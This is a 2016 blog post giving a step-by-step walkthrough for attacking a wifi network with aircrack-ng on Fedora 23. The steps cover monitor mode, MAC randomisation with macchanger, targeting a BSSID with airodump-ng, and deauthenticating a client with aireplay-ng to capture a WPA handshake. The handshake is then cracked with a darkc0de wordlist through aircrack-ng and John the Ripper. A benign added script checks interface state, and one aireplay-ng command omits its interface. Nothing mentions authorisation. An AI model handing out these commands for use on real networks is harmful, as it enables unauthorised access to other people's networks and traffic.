Saturday, 6 February 2016

Fedora 23 / Aircrack on HP Mini 210 3025sa

Working with airmon-ng on Fedora 23 running on HP Mini 210 3025sa with an Atheros AR9285 wifi card using stock kernel ath9k module.

First, stop every service that may interfere with the wireless interface. airmon-ng can list the processes it considers troublesome, and we then stop the corresponding services ourselves: letting airmon-ng kill them (airmon-ng check kill) does not stop other tools or monitors from restarting those processes. Before starting, disconnect from all wireless networks.
$ airmon-ng check
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
  769 NetworkManager
  779 avahi-daemon
  785 avahi-daemon
  891 wpa_supplicant

$ service avahi-daemon stop
$ service NetworkManager stop
$ service wpa_supplicant stop

Bring the interface down and verify it (the flags line shows no 'UP' flag):
$ ifconfig wlo1 down && ifconfig -a
...
wlo1: flags=802  mtu 1500

At this point the wireless card is down and disconnected, and it has to be put into monitor mode. To do this by hand:
$ iwconfig wlo1 mode monitor
which keeps the same interface name (wlo1), now in monitor mode. To let airmon-ng handle it instead:

$ airmon-ng start wlo1
PHY Interface Driver  Chipset

phy0 wlo1  ath9k  Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
  (mac80211 monitor mode vif enabled for [phy0]wlo1 on [phy0]wlo1mon)
    (mac80211 station mode vif disabled for [phy0]wlo1)

# verify monitor mode and note the interface name change (wlo1 is now wlo1mon)
$ iwconfig
...
wlo1mon   IEEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=15 dBm
$ ifconfig -a
...
wlo1mon: flags=4163  mtu 1500
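The two manual checks above (interface down before the mode change, monitor interface present and UP afterwards) are easy to get wrong when the interface name changes under you. The following is an added example, not code from the original post: POSIX sh functions that parse iwconfig / ifconfig -a text for a named interface, with constructed sample output shaped like the transcripts above. The real commands and the reading of flags= as a decimal bitmask with IFF_UP = 0x1 are standard; the function names are my own.

```sh
#!/bin/sh
# Added example (not from the original post): offline checks for the interface
# state changes described above. Each function takes the interface name and the
# captured text of `iwconfig` / `ifconfig -a`, so it can be exercised against
# constructed output and then fed real output, e.g. wifi_mode wlo1mon "$(iwconfig 2>/dev/null)".

# Print the Mode: value of IFACE from iwconfig text; fail if IFACE has no Mode line.
# iwconfig starts each interface block at column 0 and indents continuation lines.
wifi_mode() {
    printf '%s\n' "$2" | awk -v ifc="$1" '
        /^[^ \t]/ { cur = $1 }                       # a new interface block begins
        cur == ifc && match($0, /Mode:[A-Za-z-]+/) {
            print substr($0, RSTART + 5, RLENGTH - 5); ok = 1; exit
        }
        END { exit ok ? 0 : 1 }'
}

# Succeed only when the flags= word of IFACE in ifconfig text has IFF_UP (0x1) set.
# Works on both "flags=4163<UP,...>" and the angle-bracket-stripped "flags=4163".
iface_is_up() {
    flags=$(printf '%s\n' "$2" | awk -v ifc="$1:" '
        $1 == ifc { sub(/^flags=/, "", $2); sub(/[^0-9].*/, "", $2); print $2; exit }')
    [ -n "$flags" ] && [ $((flags & 1)) -eq 1 ]
}

# Ready for airodump-ng: the interface exists, is in Monitor mode, and is UP.
monitor_ready() {
    [ "$(wifi_mode "$1" "$2")" = Monitor ] && iface_is_up "$1" "$3"
}

# Constructed sample output, shaped like the transcripts in the post.
SAMPLE_IWCONFIG='lo        no wireless extensions.

wlo1mon   IEEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=15 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off'
SAMPLE_IFCONFIG_UP='wlo1mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500'
SAMPLE_IFCONFIG_DOWN='wlo1: flags=802  mtu 1500'

if monitor_ready wlo1mon "$SAMPLE_IWCONFIG" "$SAMPLE_IFCONFIG_UP"; then
    echo "wlo1mon: monitor mode and UP, safe to start airodump-ng"
fi
if ! monitor_ready wlo1 "$SAMPLE_IWCONFIG" "$SAMPLE_IFCONFIG_DOWN"; then
    echo "wlo1: not ready (no monitor vif under that name, or interface down)"
fi
```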

# randomise the MAC address of the monitor interface (macchanger needs it down)
$ ifconfig      wlo1mon down
$ macchanger -r wlo1mon
$ ifconfig      wlo1mon up

At this stage we can use the newly created logical wlo1mon interface:
# see what is around; -a shows only associated clients
$ airodump-ng -a wlo1mon

# watch only the specific bssid on the channel found above, writing the
# capture to /tmp/wifi-01.cap (airodump-ng appends a sequence number to -w)
$ airodump-ng -d <bssid> -c <channel> wlo1mon -w /tmp/wifi

# deauth
$ aireplay-ng --deauth 1 -a <bssid> -c <client mac>

# attempt to crack the handshake (if captured) with the dictionary given by -w;
# if the capture file contains more than one bssid, use -b to pick one so the
# run is non-interactive
$ aircrack-ng /tmp/wifi-01.cap -w /usr/share/dict/darkc0de

For long-running, resumable cracking, John the Ripper can be used in conjunction with aircrack-ng.

# use John the Ripper as the wordlist feeder, with a named session so the run can be resumed
$ john --session=foo --stdout --wordlist=/usr/share/dict/darkc0de | \
    aircrack-ng -w - -b 00:11:22:33:44:55 /tmp/wifi-01.cap

# use 'q' or Ctrl-C to pause cracking

# restart cracking from where the session left off
$ john --restore=foo | \
    aircrack-ng -w - -b 00:11:22:33:44:55 /tmp/wifi-01.cap


To clean up the logical interface created and return the wireless interface to normal use (airmon-ng stop takes the monitor interface name):

$ airmon-ng stop wlo1mon
$ for i in wpa_supplicant avahi-daemon NetworkManager; do service $i start ; done
At this point bring back the connection in the NetworkManager and go about your day.
